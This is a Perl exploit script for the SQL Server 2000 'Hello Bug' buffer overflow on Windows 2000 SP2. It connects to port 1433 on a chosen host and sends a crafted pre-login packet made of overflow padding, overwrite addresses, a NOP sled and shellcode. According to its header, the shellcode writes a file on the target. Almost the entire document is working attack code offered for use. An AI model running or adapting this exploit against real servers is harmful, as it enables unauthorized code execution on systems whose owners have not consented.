#!/usr/local/bin/perl #----------------------------------------------------------- # Exploit will create file '\scan_sql2k_bo2.' # # SQL Server 2000 'Hello Bug' for Win2k(SP2) # by sk@scan-associates.net & spoonfork # # Bug found by # Dave Aitel # http://online.securityfocus.com/archive/1/286311/2002-08-02/2002-08-08/0 # # http://www.scan-associates.net/ # greetz to: scan clan, especially to tynon, pokleyzz, and wyse # Alphaque and L33tdawg. # and Dave Aitel for finding and not releasing the exploit :> # original and most up-to-date of dis file can be found in # http://www.scan-associates.net/papers/sql2kx2.txt #----------------------------------------------------------- use Socket; $connect_host = $ARGV[0]; if (!defined($connect_host)) { print "Usage: $0 \n"; exit 255; } $port = 1433; $iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n"; $sock_addr = pack_sockaddr_in($port,$iaddr); socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n"; connect(SOCKET,$sock_addr) || die "Connect Error\n"; select(SOCKET); $|=1; select(STDOUT); $bug = "\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; $bug .= "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; $bug .= "\x10\x00\x00\x00"; $bug2 = "A" x 528; $bug .= $bug2; $bug .= "\x6b\xd0\xc0\x40"; $bug .= "AAAA"; $bug .= "\x83\x91\xe8\x77"; $bug .= "\x50\x1e\xd0\x42"; $bug .= "\x0b\x03\x0f\x02"; $bug .= "DDDD"; $bug .= "\x50\x1e\xd0\x42"; $bug .= "\x50\x1e\xd0\x42"; $bug3 = "\x90" x 88; $bug .= $bug3; $bug .= "\x8B\xF1\x33\xC0\xC7\x06\x5C\x73\x63\x61\xC7\x46\x04\x6E\x5F\x73"; $bug .= "\x71\xC7\x46\x08\x6C\x32\x6B\x5F\xC7\x46\x0C\x62\x6F\x32\x2E\x88"; $bug .= "\x46\x10\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\xB8\x6C\xC2"; $bug .= "\x01\x78\xFF\xD0\xB8\xC7\x3E\x01\x78\xFF\xD0"; $bug .= "\x00\x24\x01\x00\x00"; print SOCKET $bug;